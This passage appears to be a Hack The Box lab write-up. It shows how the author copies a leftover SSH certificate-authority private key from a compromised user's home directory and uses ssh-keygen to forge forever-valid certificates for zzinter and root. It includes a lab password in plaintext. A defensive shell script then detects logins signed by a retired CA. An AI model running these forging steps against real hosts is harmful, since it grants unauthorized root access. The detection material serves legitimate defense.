Certificates


msainristil@itrc:~$ ll
total 44K
4.0K drwxr-xr-x 1 msainristil msainristil 4.0K Aug  4 18:31 decommission_old_ca
8.0K drwx------ 1 msainristil msainristil 4.0K Aug  4 16:46 .
4.0K -rw------- 1 msainristil msainristil 1.4K Aug  4 16:46 .viminfo
4.0K drwx------ 2 msainristil msainristil 4.0K Aug  4 15:49 .ssh
   0 lrwxrwxrwx 1 root        root           9 Jul 23 14:22 .bash_history -> /dev/null
8.0K drwxr-xr-x 1 root        root        4.0K Jul 23 14:22 ..
4.0K -rw-r--r-- 1 msainristil msainristil  220 Mar 29 19:40 .bash_logout
4.0K -rw-r--r-- 1 msainristil msainristil 3.5K Mar 29 19:40 .bashrc
4.0K -rw-r--r-- 1 msainristil msainristil  807 Mar 29 19:40 .profile

After moving laterally to the msainristil user via SSH, I found an interesting directory in that user's home directory.

┌──(kali㉿kali)-[~/…/htb/labs/resource/certificates]
└─$ scp -r msainristil@$IP:~/decommission_old_ca .
msainristil@10.10.11.27's password: 82yards2closeit
ca-itrc.pub                                                                                           100%  572    13.9KB/s   00:00    
ca-itrc                                                                                               100% 2602    60.8KB/s   00:00    

I transferred the directory to Kali.

decommission_old_ca


┌──(kali㉿kali)-[~/…/htb/labs/resource/certificates]
└─$ ll decommission_old_ca
total 28K
4.0K drwxr-xr-x 3 kali kali 4.0K Aug  4 20:39 ..
4.0K drwxr-xr-x 2 kali kali 4.0K Aug  4 20:39 .
4.0K -rw------- 1 kali kali 2.6K Aug  4 20:39 ca-itrc
4.0K -rw-r--r-- 1 kali kali  572 Aug  4 20:39 ca-itrc.pub

The decommission_old_ca directory appears to contain a keypair for the CA. This must be what was mentioned in the messages.

Key Signing for zzinter


┌──(kali㉿kali)-[~/…/htb/labs/resource/decommission_old_ca]
└─$ ssh-keygen -s ca-itrc -I zzinter -n zzinter ca-itrc
Signed user key ca-itrc-cert.pub: id "zzinter" serial 0 for zzinter valid forever

I can use the private key of the CA to sign a user key for the zzinter user.

┌──(kali㉿kali)-[~/…/htb/labs/resource/decommission_old_ca]
└─$ ll
total 20K
4.0K drwxr-xr-x 2 kali kali 4.0K Aug  4 22:01 .
4.0K -rw-r--r-- 1 kali kali 2.0K Aug  4 22:01 ca-itrc-cert.pub
4.0K drwxr-xr-x 5 kali kali 4.0K Aug  4 22:00 ..
4.0K -rw------- 1 kali kali 2.6K Aug  4 20:39 ca-itrc
4.0K -rw-r--r-- 1 kali kali  572 Aug  4 20:39 ca-itrc.pub
 
┌──(kali㉿kali)-[~/…/htb/labs/resource/decommission_old_ca]
└─$ mv ca-itrc-cert.pub zzinter-itrc-cert.pub

It generated the signed public key file, ca-itrc-cert.pub, which I renamed above. I can then use these to authenticate to the target system.

Key Signing for root


┌──(kali㉿kali)-[~/…/htb/labs/resource/decommission_old_ca]
└─$ ssh-keygen -s ca-itrc -I root -n root ca-itrc
Signed user key ca-itrc-cert.pub: id "root" serial 0 for root valid forever

I can also use the private key of the CA to sign a user key for the root account, as the CA is essentially root.

┌──(kali㉿kali)-[~/…/htb/labs/resource/decommission_old_ca]
└─$ mv ca-itrc-cert.pub root-itrc-cert.pub

I also renamed it to be more distinguishable. I can then use these to authenticate to the target system.
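
From the defender's side, a login with a certificate signed this way is recorded by sshd with the certificate's key ID, serial and the fingerprint of the signing CA. The following is an added example, not part of the original writeup, that scans auth log lines for certificate logins signed by a CA that should no longer be issuing. The function names, the sample log lines and both fingerprints are constructed placeholders.

```shell
#!/bin/sh
# Added example: report sshd certificate logins whose certificate was signed
# by a retired CA. sshd logs such logins as
#   Accepted publickey for USER from IP port N ssh2: T-CERT FP ID KEYID (serial N) CA T CAFP
# KEYID is chosen by whoever signs (ssh-keygen -I), so match on the CA
# fingerprint, not on the ID.
# Placeholder fingerprint (constructed); get the real value with
#   ssh-keygen -l -f <retired CA public key>
RETIRED_CA_FP='SHA256:RETIREDCAPLACEHOLDERFINGERPRINT'

# Usage: retired_ca_logins CA_FINGERPRINT < auth.log
retired_ca_logins() {
    awk -v ca="$1" '
    /Accepted publickey for / &&
    match($0, / ID .* [(]serial [0-9]+[)] CA [^ ]+ [^ ]+/) {
        # tail = "KEYID (serial N) CA TYPE CAFP"; KEYID may contain spaces
        n = split(substr($0, RSTART + 4, RLENGTH - 4), t, " ")
        cafp = t[n]; sub(/,$/, "", cafp)      # sshd may append ", <info>"
        if (cafp != ca) next
        serial = t[n - 3]; sub(/[)]$/, "", serial)
        keyid = t[1]
        for (i = 2; i <= n - 5; i++) keyid = keyid " " t[i]
        for (i = 1; i <= NF; i++) if ($i == "Accepted") break
        printf "user=%s from=%s key_id=\"%s\" serial=%s\n", $(i + 3), $(i + 5), keyid, serial
    }'
}

# Constructed sample log lines (hosts, addresses, PIDs and fingerprints are made up).
sample_log() {
    cat <<'EOF'
Aug  4 22:05:11 host sshd[901]: Accepted publickey for zzinter from 192.0.2.10 port 40122 ssh2: RSA-CERT SHA256:AAAAexampleuserkey1 ID zzinter (serial 0) CA RSA SHA256:RETIREDCAPLACEHOLDERFINGERPRINT
Aug  4 22:06:40 host sshd[915]: Accepted publickey for root from 192.0.2.10 port 40150 ssh2: RSA-CERT SHA256:AAAAexampleuserkey1 ID root (serial 0) CA RSA SHA256:RETIREDCAPLACEHOLDERFINGERPRINT
Aug  4 22:09:02 host sshd[940]: Accepted publickey for deploy from 198.51.100.7 port 51000 ssh2: ED25519-CERT SHA256:BBBBexampleuserkey2 ID ci job 42 (serial 1187) CA ED25519 SHA256:CURRENTCAPLACEHOLDERFINGERPRINT
Aug  4 22:11:30 host sshd[951]: Accepted publickey for alice from 198.51.100.9 port 51200 ssh2: ED25519 SHA256:CCCCexampleplainkey3
Aug  4 22:12:00 host sshd[960]: Accepted password for msainristil from 192.0.2.10 port 40200 ssh2
EOF
}

# Run over the constructed sample when executed directly.
sample_log | retired_ca_logins "$RETIRED_CA_FP"
```

Any hit means the retired CA is still listed as trusted for user certificates on that host, so the key pair needs to be removed from the trust configuration or revoked rather than only set aside in a home directory.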